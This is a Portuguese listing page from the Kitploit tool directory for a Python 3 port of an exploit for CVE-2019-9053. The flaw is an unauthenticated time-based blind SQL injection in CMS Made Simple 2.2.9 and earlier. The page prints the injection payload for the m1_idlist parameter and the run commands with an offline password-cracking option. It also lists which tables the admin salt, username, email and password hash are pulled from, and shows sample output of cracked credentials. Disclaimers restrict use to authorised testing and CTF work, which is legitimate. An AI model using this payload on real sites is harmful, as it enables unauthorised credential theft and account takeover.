Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2019-9053-py3 — Exploit de injeção SQL cega baseada em tempo não autenticado para CMS Made Simple ≤ 2.2.9 (CVE-2019-9053), portado para Python 3. | Kitploit
Ferramentas/GitHubGitHub/vedantrana73/cve-2019-9053-py3
Quebra de SenhasAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubvedantrana73/cve-2019-9053-py3

cve-2019-9053-py3

Exploit de injeção SQL cega baseada em tempo não autenticado para CMS Made Simple ≤ 2.2.9 (CVE-2019-9053), portado para Python 3.

Ver Repositório
há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2019-9053 — Exploração SQLi no CMS Made Simple (Python 3)

Python CVE Type Target License

Aviso: Esta ferramenta destina-se apenas a testes de penetração autorizados e fins educacionais. Executá-la contra sistemas sem permissão explícita por escrito é ilegal. O autor não assume nenhuma responsabilidade por uso indevido.


Visão Geral

Este é um porte para Python 3 do exploit público para CVE-2019-9053 — uma vulnerabilidade de injeção SQL cega baseada em tempo não autenticada no CMS Made Simple ≤ 2.2.9.

O parâmetro vulnerável é m1_idlist no endpoint /moduleinterface.php (módulo News). A entrada do usuário é passada sem sanitização para uma consulta SQL, permitindo que um atacante não autenticado extraia o salt do administrador, nome de utilizador, email e hash da senha — e opcionalmente quebre a senha offline.

Exploit original por Daniele Scanu @ Certimeter Group.
Porte para Python 3 com correções e limpeza.


Como Funciona

O exploit utiliza um oráculo de temporização — ele injeta SELECT sleep(T) em uma condição SQL LIKE e mede o tempo de resposta HTTP. Se o servidor atrasar ≥ T segundos, a condição injetada era verdadeira. Isso permite extrair dados um caractere de cada vez sem que nenhum dado apareça no corpo da resposta HTTP.

root@kitploit:~
Estrutura do payload:
  m1_idlist=a,b,1,5))+and+(select+sleep(1)+from+cms_users
            +where+password+like+0x{hex(prefixo_conhecido+palpite)}25
            +and+user_id+like+0x31)+--+

Ordem de extração:

Após a extração, um ataque offline de dicionário opcional calcula MD5(salt + palavra) contra uma wordlist — sem necessidade de mais requisições de rede.


Mudanças para Python 3

O script original foi escrito para Python 2. As seguintes mudanças críticas foram corrigidas:


Requisitos

root@kitploit:~
pip3 install requests termcolor
DependênciaPropósito
requestsRequisições HTTP ao alvo
termcolorSaída colorida no terminal

Uso

root@kitploit:~
# Extração básica (sem quebra de senha)
python3 exploit.py -u http://<ip-do-alvo>/simple

# Extração + quebra de senha offline
python3 exploit.py -u http://<ip-do-alvo>/simple --crack -w /usr/share/wordlists/rockyou.txt

Opções

BandeiraDescrição
-u, --url

Exemplo de Saída

root@kitploit:~
[+] Salt para a senha encontrado: 1234abcd
[+] Nome de utilizador encontrado: admin
[+] Email encontrado: [email protected]
[+] Senha encontrada: a1b2c3d4e5f6...
[+] Senha quebrada: password123

Detalhes do CVE


Referências

  • NVD — CVE-2019-9053
  • Exploit original — Exploit-DB #46635
  • CMS Made Simple

Legal

Este exploit é fornecido apenas para testes de penetração autorizados e uso educacional/CTF.
O uso não autorizado contra sistemas que você não possui ou para os quais não possui permissão explícita por escrito é uma infração criminal de acordo com o IT Act, 2000 (Índia) e leis equivalentes em todo o mundo.

Baixar ferramenta
EtapaCampoTabelaObservações
1Saltcms_siteprefsNecessário para quebrar a senha
2Nome de utilizadorcms_usersuser_id = 1 (admin)
3Emailcms_usersuser_id = 1 (admin)
4Senhacms_usersArmazenada como MD5(salt + senha)
#AlteraçãoMotivo
1print "..." → print("...")print é uma função no Python 3
2hashlib.md5(str(salt) + line) → hashlib.md5((salt + line).encode())hashlib.md5() requer bytes no Python 3
3dict = open(wordlist) → with open(wordlist) as wordlist_filedict sombreia um built-in; alterado para gerenciador de contexto
4print "\033c" → print("\033c", end="")Evita nova linha dupla ao limpar o terminal
5print colored(...) → print(colored(...))colored() retorna uma string; precisa do wrapper print()
URL base da instalação do CMS Made Simple
-w, --wordlistCaminho para uma wordlist para quebra de senha offline
-c, --crackAtiva o modo de quebra de senha
CampoValor
ID do CVECVE-2019-9053
Pontuação CVSS7.5 (Alta)
TipoInjeção SQL cega baseada em tempo não autenticada
AfetadoCMS Made Simple ≤ 2.2.9
Parâmetrom1_idlist no módulo News
Autenticação necessáriaNenhuma
CorreçãoCMS Made Simple 2.2.10+